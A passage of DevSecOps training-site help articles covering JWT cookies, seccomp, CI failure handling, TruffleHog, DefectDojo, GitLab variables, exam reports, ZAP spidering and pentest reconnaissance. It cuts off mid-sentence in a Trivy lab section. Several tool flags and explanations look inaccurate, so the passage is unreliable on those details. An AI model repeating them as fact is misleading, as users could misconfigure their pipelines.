JWT stored in HttpOnly, Secure, SameSite=Lax cookie. - [ ] API reads the token from the cookie (or redesign to accept header). - [ ] Angular HTTP calls use { withCredentials: true } for cross‑origin APIs. - [ ] Server CORS config includes Access-Control-Allow-Credentials: true and a specific Access-Control-Allow-Origin. - [ ] CSP header is enabled (Content-Security-Policy: default-src 'self'; script-src 'self'). - [ ] Run an XSS scanner (e.g., OWASP ZAP) and a CSRF test suite. 7. Takeaway Storing JWTs in HttpOnly, SameSite‑protected cookies and letting the server read them directly gives you the strongest defense against XSS while still supporting seamless authentication for Angular SPAs. Use Angular’s withCredentials flag only when you need to send those cookies across origins, and always pair it with proper CORS headers and a robust CSP. By following these patterns, you can build Angular applications that are both user‑friendly and resilient against the most common web‑security threats.

Last updated on Jan 07, 2026

Docker Image Declaration, Seccomp Profiles, and Handling Failures in GitHub Actions

Docker Image Declaration, Seccomp Profiles, and Handling Failures in GitHub Actions Learn why certain Docker image declarations don’t work in CI/CD pipelines, how seccomp filters affect chown/chmod, and the best ways to allow failures in GitHub Actions. Introduction When you start building DevSecOps pipelines, you quickly discover that small configuration details can have a big impact on security and reliability. This article explains three common stumbling blocks: 1. Why you can’t declare a Docker image up‑front for certain hysnsec images – the difference between static image pulls and dynamic builds in GitLab CI. 2. How Seccomp profiles influence system calls such as chown and chmod, and why those calls sometimes succeed and sometimes fail. 3. How to let a step or job fail gracefully in GitHub Actions using continue-on-error and conditional expressions. By the end of the guide you’ll be able to write more robust CI/CD definitions, troubleshoot Seccomp‑related errors, and keep your pipelines running even when non‑critical steps break. 1. Declaring Docker Images in GitLab CI – Why “Up‑Front” Doesn’t Always Work 1.1 What “declare the image up‑front” means In a .gitlab-ci.yml file you can specify an image in two ways: # 1️⃣ Static declaration (up‑front) image: hysnsec/bandit:latest # 2️⃣ Dynamic declaration (inside a job) job_name: script: - docker run --rm -v $(pwd):/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json The first approach tells GitLab Runner to pull the image once before any job starts. The second runs the image inside the job’s script. 1.2 Why the static approach fails for some hysnsec images | Reason | Explanation | |--------|-------------| | Image requires runtime arguments | Many hysnsec images expect volume mounts (-v $(pwd):/src) or environment variables that are only known at job execution time. Declaring the image alone provides none of these, causing the container to exit immediately. | | Custom entrypoint logic | Some images replace the default entrypoint with a wrapper script that expects parameters (e.g., a path to scan). Without those parameters the container cannot start correctly. | | Security restrictions | GitLab’s shared runners may block privileged operations required by the image when it is pulled as the default environment. Running the image explicitly inside script lets you add --privileged or other flags if needed. | Bottom line: Use a static image: declaration only when the container can run without additional runtime configuration. For security‑focused images like those from hysnsec, it’s safer to invoke them inside the job’s script. 1.3 Quick reference – When to use each style - Static image: – Simple unit tests, language runtimes, linting tools that need no extra mounts. - Dynamic docker run – Scanners, build tools, or any image that requires volumes, environment variables, or special flags. 2. Seccomp Profiles – Why chown and chmod May Appear to Work or Fail Seccomp (Secure Computing Mode) filters the system calls a container can execute. A typical DevSecOps lab will provide a custom Seccomp JSON that blocks risky calls while allowing the rest. 2.1 Understanding the behavior | Scenario | Seccomp rule | Observed result | Why it happens | |----------|--------------|----------------|----------------| | mkdir blocked | mkdir syscall denied | adduser fails at directory creation | The user‑creation flow tries to create /home/abc. The blocked mkdir aborts the process, producing “Operation not permitted”. | | chown blocked | chown syscall denied | adduser fails after directory is created | The home directory is created, but the subsequent chown 1000:1000 /home/abc is blocked, causing the same error message. | | chmod blocked | chmod syscall denied | adduser fails during permission change | After mkdir, the tool attempts chmod 488 /home/abc. The denied syscall stops the flow. | When the Seccomp profile does not block chown or chmod, those calls succeed because the container’s process has the required capabilities (usually root inside the container). 2.2 Practical example # Inside a container with a restrictive seccomp profile root@container:/# adduser abc Adding user `abc' ... Creating home directory `/home/abc' ... Stopped: chown 1000:1000 /home/abc: Operation not permitted If you remove the chown rule from the profile: { "syscalls": [ { "name": "chmod", "action": "SCMP_ACT_ALLOW" }, { "name": "mkdir", "action": "SCMP_ACT_ALLOW" } // Note: chown is omitted → default allow ] } the same command succeeds because the kernel no longer blocks the chown syscall. 2.3 Tips for working with Seccomp 1. Start with a permissive profile (SCMP_ACT_ALLOW for everything) and iteratively add blocks. 2. Log denied syscalls – run the container with --security-opt seccomp=unconfined and inspect dmesg to see which calls are being filtered. 3. Remember ownership matters – chmod works for the file owner. If you run as root, you can always change permissions; non‑root users will be blocked by the profile. 4. Test with real user‑creation commands (useradd, adduser) to verify that the profile doesn’t unintentionally break provisioning steps. 3. Allowing Failures in GitHub Actions – continue-on-error and Conditional Execution In CI pipelines, some steps are “nice‑to‑have” (e.g., security scans) and should not break the whole workflow. GitHub Actions provides two mechanisms: 3.1 continue-on-error – Mark a step or job as successful even if it fails sast: runs-on: ubuntu-20.04 needs: test steps: - uses: actions/checkout@v2 - name: Run Bandit scan run: | docker run --rm -v $(pwd):/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json continue-on-error: true # <-- step never fails the job - name: Upload results uses: actions/upload-artifact@v2 with: name: Bandit path: bandit-output.json if: always() # ensures artifact upload runs even if previous step failed Result: The job finishes with a green checkmark, but the scan’s exit code is still recorded in the logs. 3.2 if: always() – Run a step regardless of previous outcome Useful for cleanup or artifact collection: - name: Cleanup temporary files run: rm -rf /tmp/tmpfile if: always() 3.3 Combining both for a “soft‑fail” job sast: runs-on: ubuntu-20.04 needs: test continue-on-error: true # entire job never fails the workflow steps: - uses: actions/checkout@v2 - run: docker run --rm -v $(pwd):/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json - uses: actions/upload-artifact@v2 with: name: Bandit path: bandit-output.json if: always() 3.4 When to use each approach | Situation | Recommended setting | |-----------|----------------------| | Optional security scan – you want a report but don’t want to block the pipeline | continue-on-error: true on the scan step | | Mandatory build step – failure must stop the pipeline | Omit continue-on-error; use default behavior | | Always‑run cleanup – regardless of success/failure | if: always() on the cleanup step | Common Questions & Quick Tips - Q: Can I override a Seccomp profile at runtime? A: Yes. Use --security-opt seccomp=/path/to/profile.json with docker run. For GitHub Actions, add it to the run command. - Q: Why does my GitLab job still fail even with continue-on-error? A: continue-on-error is a GitHub Actions feature. In GitLab you need allow_failure: true on the job definition. - Tip: When testing Seccomp changes, run the container with --security-opt seccomp=unconfined first to confirm that the issue is truly a blocked syscall. - Tip: Keep your GitHub Actions YAML tidy by extracting reusable steps into reusable workflows or composite actions – especially when you repeatedly apply continue-on-error. Conclusion Understanding the nuances of Docker image declaration, Seccomp filtering, and failure handling makes your DevSecOps pipelines both secure and resilient. Declare images dynamically when they need runtime parameters, fine‑tune Seccomp profiles to block only the truly dangerous syscalls, and use continue-on-error together with conditional if: always() to keep non‑critical steps from derailing the entire workflow. Apply these best practices, and you’ll spend less time debugging and more time delivering secure software.

Last updated on Jan 06, 2026

TruffleHog Scanning Options & Repository Path: How to Use `file:///` and `--repo_path` in Docker‑Based Labs

TruffleHog Scanning Options & Repository Path: How to Use file:/// and --repo_path in Docker‑Based Labs Learn exactly what file:/// points to, how the --repo_path flag works inside a container, and how to control branch scanning with TruffleHog. Introduction TruffleHog is a popular open‑source tool for detecting secrets (API keys, passwords, tokens, etc.) in Git repositories. In many DevSecOps labs the tool runs inside a Docker container, and learners often wonder: - What does the file:/// URL refer to – the host filesystem or the container’s filesystem? - Why does the command use a --repo_path flag that isn’t listed in trufflehog --help? - Can we replace --repo_path with a plain git URL? - Does TruffleHog scan every branch automatically, or only a specific one? This article answers those questions step‑by‑step, provides ready‑to‑copy command examples, and offers tips for scanning private repositories and limiting the scope of a scan. 1. Understanding file:/// and the Mounted /src Directory 1.1 What file:/// Means file:/// is a URI scheme that tells TruffleHog to treat the following path as a local filesystem location, not a remote Git URL. When you run: docker run --rm -v $(pwd):/src \ hysnsec/trufflehog \ --repo_path /src file:///src \ --json > trufflehog-output.json the file:///src part resolves to /src inside the Docker container. 1.2 How the Host Directory Becomes /src - $(pwd) – the current working directory on the GitLab Runner (or your local machine). - -v $(pwd):/src – Docker’s volume flag that bind‑mounts the host directory into the container at the path /src. Result: everything you see in your host’s $(pwd) is available to the container at /src. TruffleHog will therefore scan the exact same files that exist on the host. 1.3 Quick Visual Host (GitLab Runner) Container ------------------- ---------- /home/gitlab-runner/project <-- /src (mounted via -v) When TruffleHog receives file:///src, it walks the /src directory inside the container, which mirrors the host project directory. 2. The --repo_path Flag – Why It Works Even If Not Listed 2.1 Where the Flag Comes From The official TruffleHog binary supports a --repo_path option, but the Docker image’s entrypoint script often wraps the binary and exposes a simplified CLI. The --help output you see when you run docker run hysnsec/trufflehog --help shows only the top‑level commands, not every underlying flag. The image still forwards --repo_path to the binary, so it works. 2.2 What --repo_path Does - --repo_path <path> tells TruffleHog to treat <path> as the root of the repository to scan. - It is required when you are scanning a local checkout (as opposed to a remote Git URL). 2.3 Can You Use a Git URL Instead? Yes. If you have a public repository, you can replace the file:/// syntax with a standard Git URL: docker run --rm hysnsec/trufflehog \ --repo_path /tmp \ https://github.com/example/public-repo.git \ --json > trufflehog-output.json For private repositories you must provide authentication (SSH keys, personal access tokens, or --username/--password flags). The simple file:/// approach avoids authentication because it scans a local copy that you already have access to. 3. Branch Scanning – All Branches vs. Specific Branch 3.1 Default Behavior By default, TruffleHog walks the entire commit history of every branch in the repository. This includes: - master / main - Feature branches - Remote tracking branches (if they exist locally) 3.2 Scanning a Single Branch If you only care about a particular branch, use the --branch flag: docker run --rm -v $(pwd):/src hysnsec/trufflehog \ --repo_path /src \ file:///src \ --branch develop \ --json > trufflehog-output.json Only the develop branch’s history will be examined. 3.3 Practical Test 1. Create a secret on a new branch: git checkout -b secret-branch echo "API_KEY=abcd1234" > .env git add .env && git commit -m "Add secret" git push origin secret-branch 2. Run TruffleHog without --branch – you’ll see the secret reported. 3. Run TruffleHog with --branch main – the secret is ignored because it lives only on secret-branch. 4. Scanning Private Repositories - TruffleHog can scan private repos only when you provide credentials. - Common approaches: | Method | How to Use | |--------|------------| | SSH key | Mount ~/.ssh into the container (-v $HOME/.ssh:/root/.ssh) and ensure the key has access to the repo. | | HTTPS token | Pass the token via --username and --password flags, or set GIT_ASKPASS environment variable. | | Git credential helper | Mount your host’s .git-credentials file. | If you cannot expose credentials, clone the repository on the host first, then scan the local copy with file:///. 5. Full Example: Scanning a Local Repo in GitLab CI # .gitlab-ci.yml trufflehog_scan: image: hysnsec/trufflehog:latest stage: test script: - | docker run --rm \ -v $(pwd):/src \ hysnsec/trufflehog \ --repo_path /src \ file:///src \ --branch main \ --json > trufflehog-output.json - cat trufflehog-output.json # optional: upload as artifact artifacts: paths: - trufflehog-output.json expire_in: 1 week The job mounts the repository, scans only the main branch, and stores the JSON report as a CI artifact. Common Questions & Tips | Question | Answer | |----------|--------| | Do I need --repo_path when scanning a remote URL? | No. For remote URLs you can omit --repo_path and just pass the URL (e.g., https://github.com/...). | | Can TruffleHog scan non‑Git filesystems? | Yes. Using file:/// lets you scan any directory, even if it isn’t a Git repo. | | How to limit the scan to recent commits? | Use --max_depth <n> to stop after n commits, or --since <date> to start from a specific point. | | Why is my scan slow? | Large histories or many branches increase runtime. Restrict with --branch or --max_depth. | | What output formats are available? | --json, --csv, or plain text (--no-color). Choose the one that fits your downstream tooling. | Tip: Always run TruffleHog on a local copy of a private repository to avoid leaking credentials in CI logs. Conclusion Understanding how file:/// interacts with Docker volume mounts, why the --repo_path flag works, and how to control branch scanning empowers you to integrate TruffleHog confidently into DevSecOps pipelines. Whether you’re scanning public open‑source projects or private codebases, the patterns shown here will help you get reliable secret‑detection results without unnecessary complexity. Happy hunting!

Last updated on Jan 07, 2026

CDP Pipeline Failures & Best Practices for DefectDojo Integration

CDP Pipeline Failures & Best Practices for DefectDojo Integration When working with the pipelines, you’ll often encounter jobs that are expected to “fail” when they detect security issues. Understanding why certain jobs can be allowed to fail—and how to handle scan results in DefectDojo—helps you keep your pipeline efficient, your reports clean, and your compliance posture strong. This article walks through the rationale behind permissive‑failure settings for specific CDP jobs and offers guidance on what scan data should be sent to DefectDojo. Table of Contents 1. Why Some Jobs May Be Allowed to Fail 2. Configuring “Allow Failure” for Specific Jobs 3. DefectDojo Integration: What to Send and What to Exclude 4. Practical Example: End‑to‑End Pipeline Setup 5. Tips & Common Questions Why Some Jobs May Be Allowed to Fail 1. Jobs Designed to Surface Vulnerabilities - sast-with-vm – Runs static application security testing (SAST) inside a virtual machine. A failure indicates that the scanner discovered one or more code‑level vulnerabilities. - sca-frontend – Executes software component analysis (SCA) on front‑end dependencies. A failing status means vulnerable libraries were found. These jobs are intentional gatekeepers. Treating a failure as a hard pipeline break would stop the build even when the only issue is a newly discovered vulnerability that you may want to triage first. 2. Jobs That Should Remain Strict - sslscan – Checks TLS configurations. A failure usually points to misconfigurations that could expose data in transit. - ansible-hardening & inspec – Enforce hardening standards and compliance checks. Failures here often indicate non‑compliant infrastructure that must be remediated before proceeding. Bottom line: Only allow failure on jobs whose primary purpose is to report findings, not to enforce mandatory compliance. Configuring “Allow Failure” for Specific Jobs 1. Open the .gitlab-ci.yml (or equivalent) file in your repository. 2. Locate the job definitions for sast-with-vm and sca-frontend. 3. Add the allow_failure: true flag: sast-with-vm: stage: test script: - ./run-sast.sh allow_failure: true # <-- permits the job to fail without breaking the pipeline sca-frontend: stage: test script: - ./run-sca.sh allow_failure: true # <-- same rationale as above 1. Commit and push the changes. The pipeline will now continue even if these jobs report vulnerabilities, while still publishing the findings for review. Note: Keep allow_failure off for jobs like sslscan, ansible-hardening, and inspec to ensure that critical security misconfigurations halt the pipeline. DefectDojo Integration: What to Send and What to Exclude DefectDojo is a powerful vulnerability management platform, but it expects certain formats and scan types. Sending only relevant results avoids clutter and improves triage speed. What to Send | Scan Type | Reason for Inclusion | |-----------|----------------------| | SAST results (sast-with-vm) | Provides line‑level code defects that developers can fix directly. | | SCA results (sca-frontend) | Highlights vulnerable third‑party libraries; essential for dependency management. | | Custom security scans (e.g., OWASP ZAP, Burp) | Adds dynamic testing data that complements static findings. | What to Exclude | Scan Type | Reason for Exclusion | |-----------|----------------------| | ansible-hardening | Generates configuration‑hardening reports that DefectDojo does not natively parse. | | inspec | Produces compliance check output (e.g., CIS benchmarks) which is better stored in a compliance dashboard rather than a vulnerability tracker. | | Non‑security artifacts (e.g., build logs, test coverage) | Irrelevant to vulnerability management and increase storage costs. | How to Push Findings to DefectDojo 1. Export the scan results in a supported format (e.g., SARIF, JUnit XML, JSON). 2. Use the DefectDojo API or the built‑in CI integration: curl -X POST "https://defectdojo.example.com/api/v2/import-scan/" \ -H "Authorization: Token <YOUR_API_TOKEN>" \ -F "scan_type=SAST" \ -F "file=@sast-results.sarif" \ -F "engagement=123" \ -F "product_name=MyApp" 1. Verify the import in the DefectDojo UI and assign findings to the appropriate remediation sprint. Practical Example: End‑to‑End Pipeline Setup Below is a simplified snippet that ties everything together: stages: - test - report - upload sast-with-vm: stage: test script: ./run-sast.sh allow_failure: true artifacts: paths: [sast-results.sarif] sca-frontend: stage: test script: ./run-sca.sh allow_failure: true artifacts: paths: [sca-results.json] sslscan: stage: test script: ./run-sslscan.sh # No allow_failure – must pass defectdojo-upload: stage: upload script: - ./upload-to-defectdojo.sh sast-results.sarif SAST - ./upload-to-defectdojo.sh sca-results.json SCA dependencies: [sast-with-vm, sca-frontend] only: - main - allow_failure: true ensures the pipeline proceeds even when vulnerabilities are found. - The final defectdojo-upload job sends only the relevant scans to DefectDojo. Tips & Common Questions ✅ Tips for a Smooth Integration - Standardize output formats across all security tools (prefer SARIF or JSON). - Tag each upload with the pipeline ID or commit SHA to maintain traceability. - Run a dry‑run of the DefectDojo import script locally before committing to CI. ❓ Common Questions | Question | Answer | |----------|--------| | Can I allow failure for sslscan? | Not recommended. TLS misconfigurations should block the pipeline until fixed. | | What if DefectDojo rejects a scan? | Check the API response; most rejections are due to unsupported file types or missing required fields. | | Should I send duplicate findings from multiple scans? | No. Consolidate duplicates in DefectDojo to avoid “noise” and ensure accurate metrics. | | How do I handle false positives? | Mark them as “false positive” in DefectDojo; this status is respected in future imports. | Bottom Line Allowing failure for sast-with-vm and sca-frontend is intentional—these jobs are meant to surface vulnerabilities without halting the build. Conversely, keep strict enforcement on compliance‑oriented jobs. When integrating with DefectDojo, send only the scans it can parse (SAST, SCA, dynamic tests) and omit hardening or compliance outputs. Following these practices will keep your CDP pipelines lean, your security reporting accurate, and your remediation workflow efficient.

Last updated on Jan 06, 2026

GitLab CI/CD: Repository Location, Predefined Variables, Tool Images, and Common Configuration Questions

GitLab CI/CD: Repository Location, Predefined Variables, Tool Images, and Common Configuration Questions Introduction When you start building DevSecOps pipelines in GitLab, you quickly encounter questions about where code lives, which environment variables you can rely on, and how to choose the right Docker image for security tools such as npm audit or Retire.js. This article consolidates the most frequently asked questions from the GitLab CI/CD labs and provides clear, actionable answers. By the end of the guide you will know: - Where the repository is cloned during a pipeline run. - Which predefined variables are available out‑of‑the‑box. - How to pick an optimal Docker image for Node‑based security scans. - Why Retire.js may still report low/medium findings when you limit severity. - How to safely run InSpec compliance checks against a production server from a CI/CD job. 1. Where Does the Repository Reside During a Pipeline? 1.1 The Source Repository - GitLab hosts the canonical source code repository. All branches, tags, and merge requests live here. 1.2 The Runner’s Workspace - When a pipeline is triggered, GitLab Runner automatically clones the repository into a temporary working directory on the runner machine. - Because the code is already present, you do not need to add an explicit git clone step in your .gitlab-ci.yml. - After the job finishes, the runner discards the workspace, ensuring a clean environment for the next job. Tip: If you need to keep a copy of the repository for debugging, enable the artifacts keyword to archive the workspace after the job completes. 2. Predefined CI/CD Variables in GitLab GitLab injects a rich set of environment variables into every job. They are read‑only and can be referenced directly in your scripts or YAML configuration. | Variable | Description | Example Use | |----------|-------------|-------------| | CI_PIPELINE_ID | Unique identifier of the current pipeline | echo "Pipeline #$CI_PIPELINE_ID" | | CI_COMMIT_REF_NAME | Branch or tag name that triggered the pipeline | docker build -t myapp:$CI_COMMIT_REF_NAME . | | CI_COMMIT_SHA | Full 40‑character commit hash | git checkout $CI_COMMIT_SHA | | CI_PROJECT_NAME | Human‑readable project name | echo "Deploying $CI_PROJECT_NAME" | | CI_RUNNER_DESCRIPTION | Text description of the runner | echo "Running on $CI_RUNNER_DESCRIPTION" | | CI_RUNNER_TAGS | Comma‑separated list of runner tags | echo "Runner tags: $CI_RUNNER_TAGS" | | CI_JOB_ID | Unique identifier for the current job | curl -X POST -d "job=$CI_JOB_ID" https://example.com | | CI_JOB_NAME | Name defined in the job: block of .gitlab-ci.yml | echo "Job: $CI_JOB_NAME" | | CI_JOB_STAGE | Pipeline stage (e.g., build, test, deploy) | if [ "$CI_JOB_STAGE" = "deploy" ]; then …; fi | | CI_REGISTRY | URL of the project's container registry | docker login $CI_REGISTRY -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD | Note: A full list of predefined variables is available in the official GitLab docs under CI/CD predefined variables. 3. Choosing the Right Docker Image for NPM Audit 3.1 Why the Image Matters Security tools need the same runtime as your application to produce accurate results. Selecting an image that mirrors your production environment reduces false positives and eliminates version mismatches. 3.2 Recommended Base Image image: node:18 # Replace 18 with the exact major version you use - node:<major> – Guarantees the Node.js version matches the one declared in your package.json. - node:latest – Useful for quick prototypes but can introduce breaking changes when the upstream image updates. 3.3 Extending the Image (Optional) If you need additional tools (e.g., jq, curl), create a custom image: FROM node:18 RUN apt-get update && apt-get install -y jq curl Then reference it in the pipeline: image: registry.example.com/custom-node-audit:latest 3.4 Sample NPM Audit Job npm_audit: stage: test script: - npm ci # Install exact dependencies - npm audit --json > audit-report.json - cat audit-report.json | jq . artifacts: paths: - audit-report.json 4. Why Retire.js Still Shows Low & Medium Findings When Using --severity high - Retire.js evaluates vulnerabilities based on its internal database. The --severity flag only influences the exit code (i.e., whether the job fails) – it does not filter the output. - Consequently, the console will still list every finding, but the job will exit with a non‑zero status only if a vulnerability meets the specified severity threshold. How to Suppress Lower‑Severity Output retire --severity high --output json | jq 'select(.severity=="high")' Or use the --ignore option to exclude specific severity levels. 5. Running InSpec Compliance Checks Against Production 5.1 What Happens When You Store a Private SSH Key in CI/CD 1. The private key is added to the runner’s protected variables (e.g., PROD_SSH_KEY). 2. During the job, the key is written to a temporary file and used to open an SSH session to the target host. 5.2 The Role of DEPLOYMENT_SERVER - The variable DEPLOYMENT_SERVER holds the hostname or IP address of the production machine you want to test. - The InSpec command typically looks like: inspec_test: stage: compliance script: - echo "$PROD_SSH_KEY" > /tmp/id_rsa - chmod 600 /tmp/id_rsa - inspec exec controls/ --target ssh://$DEPLOYMENT_SERVER --key-files /tmp/id_rsa 5.3 Security Best Practices | Recommendation | Reason | |----------------|--------| | Use protected CI/CD variables for private keys. | Limits exposure to protected branches only. | | Restrict the runner’s network access to the production subnet. | Prevents accidental lateral movement. | | Rotate SSH keys regularly and audit their usage. | Reduces risk of credential leakage. | | Prefer temporary, one‑time keys generated via a bastion host. | Limits the blast radius if a key is compromised. | Common Questions & Tips Q1: Do I need to git clone inside a job? A: No. GitLab Runner automatically clones the repository into the job’s workspace. Q2: Can I override a predefined variable? A: Yes, but only within the scope of a job using the variables: keyword. Overriding a predefined variable may lead to unexpected behavior, so use it sparingly. Q3: How do I debug a failing pipeline that uses a custom Docker image? A: Add a script: step with env and cat /etc/os-release to inspect the environment, or use the docker run -it command locally to reproduce the container. Q4: What if my pipeline needs both Node.js and Python? A: Create a multi‑stage image that installs both runtimes, or use separate jobs with different images and share artifacts between them. Conclusion Understanding where your code lives, leveraging GitLab’s predefined variables, and selecting the right Docker image are foundational steps for building reliable DevSecOps pipelines. By following the guidelines above, you can integrate tools like npm audit, Retire.js, and InSpec with confidence, while maintaining security best practices for production testing. Happy automating!

Last updated on Jan 07, 2026

CTMP Tools and Reporting Guidelines – What You Need to Know for the Certified Threat Modeling Professional Exam

CTMP Tools and Reporting Guidelines – What You Need to Know for the Certified Threat Modeling Professional Exam Introduction Preparing for the Certified Threat Modeling Professional (CTMP) exam involves more than mastering theory—you also need to know which tools are available in the course and how to assemble a clear, compliant exam report. This article walks you through the dashboard‑style tools you’ll encounter, outlines the exact components required in your exam submission, and offers practical tips to help you present your work professionally. Whether you’re a first‑time candidate or refreshing your knowledge, these guidelines will keep you on track and boost your confidence on exam day. 1. Dashboard‑Based Tools Included in the CTMP Course The CTMP curriculum introduces several threat‑modeling utilities that you can use during labs and the exam. The most prominent ones are: | Tool | Primary Use | Key Features | |------|--------------|--------------| | ThreatDragon | Open‑source threat‑modeling editor | Drag‑and‑drop data flow diagrams (DFDs), automatic STRIDE analysis, export to PDF/PNG, integration with GitHub | | ThreatModelling (the course‑specific web app) | Guided threat‑model creation | Step‑by‑step wizard, built‑in reporting templates, collaborative workspace | | Additional utilities (e.g., Microsoft Threat Modeling Tool, OWASP Threat Dragon, PlantUML) | Optional, for advanced diagramming or automation | Custom script support, API access, extensive library of symbols | Tip: While ThreatDragon is the default recommendation, you are free to use any compatible tool that produces the required diagrams and documentation. The important factor is that the output is clear, accurate, and can be embedded in your final report. 2. What the CTMP Exam Report Must Contain Your exam submission is evaluated on both content completeness and presentation quality. The following three sections are mandatory: 1. List of Exam Challenges - Enumerate each challenge exactly as it appears in the exam interface. - Use a numbered list (e.g., Challenge 1, Challenge 2, …) for easy reference. 2. Process Explanation - Describe, in your own words, how you approached each challenge. - Include the methodology, threat‑modeling technique (e.g., STRIDE, DREAD), and any decision‑making criteria. - Keep explanations concise (150‑250 words per challenge) but thorough enough to demonstrate your reasoning. 3. Evidence of Completion - Attach screenshots, log excerpts, or output files that prove you solved the challenge. - Highlight key steps (e.g., a highlighted portion of a DFD or a screenshot of a generated risk matrix). - Ensure all images are legible (minimum 300 dpi) and labeled with the corresponding challenge number. 4. 3. Incorporating Diagrams, Tables, and Other Visuals While the core report structure is fixed, you have flexibility in how you present supporting material: 3.1 Using Diagrams - Create diagrams in ThreatDragon or your preferred tool and export them as PNG or PDF. - Insert each diagram directly below the relevant challenge description. - Add a caption that includes the challenge number and a brief title (e.g., “Figure 1 – DFD for Challenge 2: Online Payment Flow”). 3.2 Adding Tables - Tables are ideal for summarizing risk scores, mitigation actions, or asset inventories. - Use Markdown table syntax in the report or embed an Excel/CSV screenshot if the platform does not support native tables. 3.3 Other Artifacts - Code snippets (e.g., a security‑control script) can be formatted using fenced code blocks. - Video clips are not accepted, but you can provide a link to a private repository (e.g., a GitHub Gist) if the exam rules permit external references. 4. Practical Example: Formatting a Single Challenge Below is a concise template you can copy for every challenge in your exam report: ### Challenge 1 – Identify Threats in the User Authentication Flow **Process Overview** 1. Imported the system architecture into ThreatDragon. 2. Applied STRIDE analysis to each data flow. 3. Prioritized threats using the DREAD scoring model. **Key Findings** | Threat | STRIDE Category | DREAD Score | Recommended Mitigation | |--------|----------------|------------|------------------------| | Credential stuffing | Spoofing | 8 | Implement CAPTCHA and rate limiting | | Session hijacking | Tampering | 7 | Enforce secure, HttpOnly cookies | **Evidence** - ![DFD for Challenge 1](./images/challenge1-dfd.png) - *Figure 1 – Data Flow Diagram highlighting the authentication endpoints.* - Screenshot of the DREAD score matrix (see Appendix A). Repeating this pattern for each challenge guarantees consistency and makes it easy for reviewers to locate information. 5. Tips for a Polished, Exam‑Ready Report - Consistent Naming: Use the same challenge numbers throughout the document, diagrams, and file names. - File Size Management: Compress images without losing readability; keep the total PDF under the platform’s size limit (usually 25 MB). - Proofread: Spelling or grammatical errors can distract reviewers from the technical content. - Version Control: Save a copy of your report before final submission; you may need to revert if a file becomes corrupted. 6. Common Questions | Question | Answer | |----------|--------| | Do I have to use ThreatDragon for the exam? | No. Any tool that can produce clear DFDs, tables, or risk matrices is acceptable, as long as the output is included in the final report. | | Can I submit a separate document for diagrams? | All supporting artifacts must be embedded in the single exam report file (PDF or DOCX) unless the exam instructions explicitly allow separate attachments. | | What if a screenshot is blurry? | Re‑capture the screen at a higher resolution or annotate the critical area. Illegible evidence may be marked as insufficient. | | Are third‑party libraries allowed in the diagrams? | Yes, you may import symbols from external libraries (e.g., Visio stencils) as long as they accurately represent the system components. | Conclusion Mastering the CTMP exam isn’t just about threat‑modeling knowledge—it also hinges on delivering a well‑structured, evidence‑rich report. By leveraging the built‑in tools like ThreatDragon, adhering to the three‑section report format, and polishing your visuals, you’ll present a professional submission that showcases both your analytical skills and attention to detail. Follow the guidelines above, double‑check every requirement, and you’ll be ready to earn your Certified Threat Modeling Professional credential with confidence.

Last updated on Jan 06, 2026

Security Testing Tools: Common Errors, What to Expect, and Course Scope Overview

Security Testing Tools: Common Errors, What to Expect, and Course Scope Overview In DevSecOps training, learners often encounter confusing results or error messages while working with tools such as OWASP ZAP, Trivy, and the Kubernetes security labs. Understanding why these issues occur, how to troubleshoot them, and what each certification course actually covers can save you hours of frustration and keep your learning path on track. This article walks through four frequently‑asked questions, explains the underlying concepts, and offers practical tips you can apply immediately in the lab environment. 1. Why Does the ZAP AJAX Spider Return No Results? The core reason The AJAX spider in OWASP ZAP is designed to discover URLs that are loaded dynamically via JavaScript. However, unlike a full browser, the spider does not execute every piece of JavaScript by default, which means: 1. Dynamic URLs hidden behind complex scripts may never be requested. 2. Single‑page applications (SPAs) that build routes on‑the‑fly can appear invisible to the spider. 3. Conditional rendering (e.g., URLs only shown after a user interaction) is missed unless explicitly triggered. How to verify and improve coverage | Step | Action | Why it helps | |------|--------|--------------| | 1. Enable “Run in Browser” mode | In ZAP → Tools → Options → AJAX Spider, tick “Run in a real browser (e.g., Chrome)” | A real browser executes JavaScript, exposing hidden endpoints. | | 2. Add manual interactions | Use the Manual Request tab to fire events (clicks, form submissions) that you suspect generate URLs. | Triggers event‑driven routes that the spider cannot guess. | | 3. Increase crawl depth | Set a higher Maximum Crawl Depth in the spider settings. | Allows the spider to follow longer chains of redirects and API calls. | | 4. Combine with a traditional spider | Run the classic ZAP spider first, then the AJAX spider. | The classic spider finds static links; the AJAX spider fills in the dynamic gaps. | | 5. Review console logs | Open the ZAP console (View → Console) and look for JavaScript errors. | Errors may indicate why certain scripts never executed. | Quick scenario You are testing a React‑based dashboard that loads data after a user clicks “View Reports.” The AJAX spider finishes with 0 URLs found. By launching the spider in Chrome and manually clicking the “View Reports” button in the browser window that ZAP opens, you’ll see several new API calls appear in the Sites tree – those were the missing URLs. 2. How Do Pentesters Gather Initial Clues for Exploitation? Information gathering (often called recon) is the foundation of any successful penetration test. The process can be broken down into three practical stages: 1. Crawl & Map the Application - Use tools (ZAP, Burp Suite, Nmap, or simple wget/curl) to enumerate every reachable URL. - Record HTTP methods, response codes, and any redirects. 2. Identify Input Vectors - Locate form fields, query parameters, JSON bodies, and JavaScript events that accept user data. - Note data types (e.g., numeric, string, file upload) and any client‑side validation. 3. Probe for Vulnerabilities - Apply automated scanners (OWASP ZAP, Nikto, or custom scripts) to each input point. - Follow up with manual testing for high‑risk issues such as SQL injection, XSS, insecure deserialization, and broken authentication. Example workflow 1️⃣ Run ZAP spider → Export sitemap → 150 endpoints identified 2️⃣ Filter for parameters → 42 distinct query strings 3️⃣ Run ZAP active scan on those 42 → 7 potential issues flagged 4️⃣ Manually verify each finding → Confirm 3 true positives (SQLi, XSS, SSRF) Tips for effective recon - Document everything – a simple spreadsheet with columns for URL, Method, Parameters, Findings keeps the data searchable. - Leverage open‑source intel – GitHub, Shodan, and public API docs often reveal hidden endpoints. - Prioritize high‑value assets – focus on admin panels, authentication endpoints, and data‑exfiltration routes first. 3. “Kubernetes Image Scanning Using Trivy” Lab Returns an Error – What to Do? Typical cause The most common reason you see an error during the Trivy lab is that the underlying virtual machine or container environment was not provisioned correctly. This can happen when: - The lab VM fails to start due to insufficient cloud resources. - Required Docker images are missing or corrupted. - Network policies block access to the container registry. Immediate troubleshooting checklist 1. Confirm VM status – In the learning portal, verify the VM shows Running and note the IP address. 2. SSH into the instance ssh learner@<lab‑ip> If you cannot connect, the provisioning step likely failed; 